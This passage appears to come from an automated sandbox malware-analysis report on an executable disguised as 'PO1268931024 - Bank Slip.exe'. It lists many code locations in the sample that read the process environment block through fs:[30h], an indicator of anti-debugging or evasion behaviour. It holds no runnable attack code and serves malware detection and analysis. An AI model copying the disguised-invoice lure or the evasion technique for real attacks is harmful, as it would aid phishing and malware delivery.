                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017983C0 mov eax, dword ptr fs:[00000030h]2_2_017983C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017983C0 mov eax, dword ptr fs:[00000030h]2_2_017983C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0186634F mov eax, dword ptr fs:[00000030h]2_2_0186634F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01838350 mov ecx, dword ptr fs:[00000030h]2_2_01838350
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185A352 mov eax, dword ptr fs:[00000030h]2_2_0185A352
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181035C mov eax, dword ptr fs:[00000030h]2_2_0181035C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181035C mov eax, dword ptr fs:[00000030h]2_2_0181035C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181035C mov eax, dword ptr fs:[00000030h]2_2_0181035C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181035C mov ecx, dword ptr fs:[00000030h]2_2_0181035C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181035C mov eax, dword ptr fs:[00000030h]2_2_0181035C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181035C mov eax, dword ptr fs:[00000030h]2_2_0181035C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01788397 mov eax, dword ptr fs:[00000030h]2_2_01788397
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01788397 mov eax, dword ptr fs:[00000030h]2_2_01788397
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01788397 mov eax, dword ptr fs:[00000030h]2_2_01788397
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178E388 mov eax, dword ptr fs:[00000030h]2_2_0178E388
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178E388 mov eax, dword ptr fs:[00000030h]2_2_0178E388
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178E388 mov eax, dword ptr fs:[00000030h]2_2_0178E388
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B438F mov eax, dword ptr fs:[00000030h]2_2_017B438F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B438F mov eax, dword ptr fs:[00000030h]2_2_017B438F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183437C mov eax, dword ptr fs:[00000030h]2_2_0183437C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01810283 mov eax, dword ptr fs:[00000030h]2_2_01810283
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01810283 mov eax, dword ptr fs:[00000030h]2_2_01810283
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01810283 mov eax, dword ptr fs:[00000030h]2_2_01810283
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178826B mov eax, dword ptr fs:[00000030h]2_2_0178826B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01794260 mov eax, dword ptr fs:[00000030h]2_2_01794260
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01794260 mov eax, dword ptr fs:[00000030h]2_2_01794260
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01794260 mov eax, dword ptr fs:[00000030h]2_2_01794260
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796259 mov eax, dword ptr fs:[00000030h]2_2_01796259
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018262A0 mov eax, dword ptr fs:[00000030h]2_2_018262A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018262A0 mov ecx, dword ptr fs:[00000030h]2_2_018262A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018262A0 mov eax, dword ptr fs:[00000030h]2_2_018262A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018262A0 mov eax, dword ptr fs:[00000030h]2_2_018262A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018262A0 mov eax, dword ptr fs:[00000030h]2_2_018262A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018262A0 mov eax, dword ptr fs:[00000030h]2_2_018262A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178A250 mov eax, dword ptr fs:[00000030h]2_2_0178A250
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178823B mov eax, dword ptr fs:[00000030h]2_2_0178823B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018662D6 mov eax, dword ptr fs:[00000030h]2_2_018662D6
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A02E1 mov eax, dword ptr fs:[00000030h]2_2_017A02E1
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A02E1 mov eax, dword ptr fs:[00000030h]2_2_017A02E1
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A02E1 mov eax, dword ptr fs:[00000030h]2_2_017A02E1
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A2C3 mov eax, dword ptr fs:[00000030h]2_2_0179A2C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A2C3 mov eax, dword ptr fs:[00000030h]2_2_0179A2C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A2C3 mov eax, dword ptr fs:[00000030h]2_2_0179A2C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A2C3 mov eax, dword ptr fs:[00000030h]2_2_0179A2C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A2C3 mov eax, dword ptr fs:[00000030h]2_2_0179A2C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01818243 mov eax, dword ptr fs:[00000030h]2_2_01818243
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01818243 mov ecx, dword ptr fs:[00000030h]2_2_01818243
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0184A250 mov eax, dword ptr fs:[00000030h]2_2_0184A250
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0184A250 mov eax, dword ptr fs:[00000030h]2_2_0184A250
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A02A0 mov eax, dword ptr fs:[00000030h]2_2_017A02A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A02A0 mov eax, dword ptr fs:[00000030h]2_2_017A02A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0186625D mov eax, dword ptr fs:[00000030h]2_2_0186625D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE284 mov eax, dword ptr fs:[00000030h]2_2_017CE284
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE284 mov eax, dword ptr fs:[00000030h]2_2_017CE284
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C656A mov eax, dword ptr fs:[00000030h]2_2_017C656A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C656A mov eax, dword ptr fs:[00000030h]2_2_017C656A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C656A mov eax, dword ptr fs:[00000030h]2_2_017C656A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018105A7 mov eax, dword ptr fs:[00000030h]2_2_018105A7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018105A7 mov eax, dword ptr fs:[00000030h]2_2_018105A7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018105A7 mov eax, dword ptr fs:[00000030h]2_2_018105A7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01798550 mov eax, dword ptr fs:[00000030h]2_2_01798550
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01798550 mov eax, dword ptr fs:[00000030h]2_2_01798550
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE53E mov eax, dword ptr fs:[00000030h]2_2_017BE53E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE53E mov eax, dword ptr fs:[00000030h]2_2_017BE53E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE53E mov eax, dword ptr fs:[00000030h]2_2_017BE53E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE53E mov eax, dword ptr fs:[00000030h]2_2_017BE53E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE53E mov eax, dword ptr fs:[00000030h]2_2_017BE53E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0535 mov eax, dword ptr fs:[00000030h]2_2_017A0535
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0535 mov eax, dword ptr fs:[00000030h]2_2_017A0535
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0535 mov eax, dword ptr fs:[00000030h]2_2_017A0535
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0535 mov eax, dword ptr fs:[00000030h]2_2_017A0535
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0535 mov eax, dword ptr fs:[00000030h]2_2_017A0535
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0535 mov eax, dword ptr fs:[00000030h]2_2_017A0535
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01826500 mov eax, dword ptr fs:[00000030h]2_2_01826500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864500 mov eax, dword ptr fs:[00000030h]2_2_01864500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864500 mov eax, dword ptr fs:[00000030h]2_2_01864500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864500 mov eax, dword ptr fs:[00000030h]2_2_01864500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864500 mov eax, dword ptr fs:[00000030h]2_2_01864500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864500 mov eax, dword ptr fs:[00000030h]2_2_01864500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864500 mov eax, dword ptr fs:[00000030h]2_2_01864500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864500 mov eax, dword ptr fs:[00000030h]2_2_01864500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CC5ED mov eax, dword ptr fs:[00000030h]2_2_017CC5ED
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CC5ED mov eax, dword ptr fs:[00000030h]2_2_017CC5ED
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017925E0 mov eax, dword ptr fs:[00000030h]2_2_017925E0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE5E7 mov eax, dword ptr fs:[00000030h]2_2_017BE5E7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE5E7 mov eax, dword ptr fs:[00000030h]2_2_017BE5E7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE5E7 mov eax, dword ptr fs:[00000030h]2_2_017BE5E7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE5E7 mov eax, dword ptr fs:[00000030h]2_2_017BE5E7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE5E7 mov eax, dword ptr fs:[00000030h]2_2_017BE5E7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE5E7 mov eax, dword ptr fs:[00000030h]2_2_017BE5E7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE5E7 mov eax, dword ptr fs:[00000030h]2_2_017BE5E7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE5E7 mov eax, dword ptr fs:[00000030h]2_2_017BE5E7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017965D0 mov eax, dword ptr fs:[00000030h]2_2_017965D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CA5D0 mov eax, dword ptr fs:[00000030h]2_2_017CA5D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CA5D0 mov eax, dword ptr fs:[00000030h]2_2_017CA5D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE5CF mov eax, dword ptr fs:[00000030h]2_2_017CE5CF
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE5CF mov eax, dword ptr fs:[00000030h]2_2_017CE5CF
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B45B1 mov eax, dword ptr fs:[00000030h]2_2_017B45B1
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B45B1 mov eax, dword ptr fs:[00000030h]2_2_017B45B1
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE59C mov eax, dword ptr fs:[00000030h]2_2_017CE59C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C4588 mov eax, dword ptr fs:[00000030h]2_2_017C4588
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01792582 mov eax, dword ptr fs:[00000030h]2_2_01792582
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01792582 mov ecx, dword ptr fs:[00000030h]2_2_01792582
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BA470 mov eax, dword ptr fs:[00000030h]2_2_017BA470
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BA470 mov eax, dword ptr fs:[00000030h]2_2_017BA470
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BA470 mov eax, dword ptr fs:[00000030h]2_2_017BA470
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0184A49A mov eax, dword ptr fs:[00000030h]2_2_0184A49A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B245A mov eax, dword ptr fs:[00000030h]2_2_017B245A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178645D mov eax, dword ptr fs:[00000030h]2_2_0178645D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181A4B0 mov eax, dword ptr fs:[00000030h]2_2_0181A4B0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE443 mov eax, dword ptr fs:[00000030h]2_2_017CE443
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE443 mov eax, dword ptr fs:[00000030h]2_2_017CE443
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE443 mov eax, dword ptr fs:[00000030h]2_2_017CE443
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE443 mov eax, dword ptr fs:[00000030h]2_2_017CE443
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE443 mov eax, dword ptr fs:[00000030h]2_2_017CE443
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE443 mov eax, dword ptr fs:[00000030h]2_2_017CE443
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE443 mov eax, dword ptr fs:[00000030h]2_2_017CE443
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE443 mov eax, dword ptr fs:[00000030h]2_2_017CE443
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178E420 mov eax, dword ptr fs:[00000030h]2_2_0178E420
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178E420 mov eax, dword ptr fs:[00000030h]2_2_0178E420
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178E420 mov eax, dword ptr fs:[00000030h]2_2_0178E420
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178C427 mov eax, dword ptr fs:[00000030h]2_2_0178C427
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C8402 mov eax, dword ptr fs:[00000030h]2_2_017C8402
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C8402 mov eax, dword ptr fs:[00000030h]2_2_017C8402
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C8402 mov eax, dword ptr fs:[00000030h]2_2_017C8402
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017904E5 mov ecx, dword ptr fs:[00000030h]2_2_017904E5
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01816420 mov eax, dword ptr fs:[00000030h]2_2_01816420
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01816420 mov eax, dword ptr fs:[00000030h]2_2_01816420
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01816420 mov eax, dword ptr fs:[00000030h]2_2_01816420
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01816420 mov eax, dword ptr fs:[00000030h]2_2_01816420
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01816420 mov eax, dword ptr fs:[00000030h]2_2_01816420
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01816420 mov eax, dword ptr fs:[00000030h]2_2_01816420
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01816420 mov eax, dword ptr fs:[00000030h]2_2_01816420
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C44B0 mov ecx, dword ptr fs:[00000030h]2_2_017C44B0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017964AB mov eax, dword ptr fs:[00000030h]2_2_017964AB
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0184A456 mov eax, dword ptr fs:[00000030h]2_2_0184A456
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181C460 mov ecx, dword ptr fs:[00000030h]2_2_0181C460
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01798770 mov eax, dword ptr fs:[00000030h]2_2_01798770
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0770 mov eax, dword ptr fs:[00000030h]2_2_017A0770
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0770 mov eax, dword ptr fs:[00000030h]2_2_017A0770
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0770 mov eax, dword ptr fs:[00000030h]2_2_017A0770
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0770 mov eax, dword ptr fs:[00000030h]2_2_017A0770
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0770 mov eax, dword ptr fs:[00000030h]2_2_017A0770
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0770 mov eax, dword ptr fs:[00000030h]2_2_017A0770
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0770 mov eax, dword ptr fs:[00000030h]2_2_017A0770
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0770 mov eax, dword ptr fs:[00000030h]2_2_017A0770
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0770 mov eax, dword ptr fs:[00000030h]2_2_017A0770
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0770 mov eax, dword ptr fs:[00000030h]2_2_017A0770
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0770 mov eax, dword ptr fs:[00000030h]2_2_017A0770
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0770 mov eax, dword ptr fs:[00000030h]2_2_017A0770
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183678E mov eax, dword ptr fs:[00000030h]2_2_0183678E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018447A0 mov eax, dword ptr fs:[00000030h]2_2_018447A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01790750 mov eax, dword ptr fs:[00000030h]2_2_01790750
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2750 mov eax, dword ptr fs:[00000030h]2_2_017D2750
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2750 mov eax, dword ptr fs:[00000030h]2_2_017D2750
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C674D mov esi, dword ptr fs:[00000030h]2_2_017C674D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C674D mov eax, dword ptr fs:[00000030h]2_2_017C674D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C674D mov eax, dword ptr fs:[00000030h]2_2_017C674D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C273C mov eax, dword ptr fs:[00000030h]2_2_017C273C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C273C mov ecx, dword ptr fs:[00000030h]2_2_017C273C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C273C mov eax, dword ptr fs:[00000030h]2_2_017C273C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018107C3 mov eax, dword ptr fs:[00000030h]2_2_018107C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CC720 mov eax, dword ptr fs:[00000030h]2_2_017CC720
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CC720 mov eax, dword ptr fs:[00000030h]2_2_017CC720
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181E7E1 mov eax, dword ptr fs:[00000030h]2_2_0181E7E1
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01790710 mov eax, dword ptr fs:[00000030h]2_2_01790710
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C0710 mov eax, dword ptr fs:[00000030h]2_2_017C0710
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CC700 mov eax, dword ptr fs:[00000030h]2_2_017CC700
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017947FB mov eax, dword ptr fs:[00000030h]2_2_017947FB
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017947FB mov eax, dword ptr fs:[00000030h]2_2_017947FB
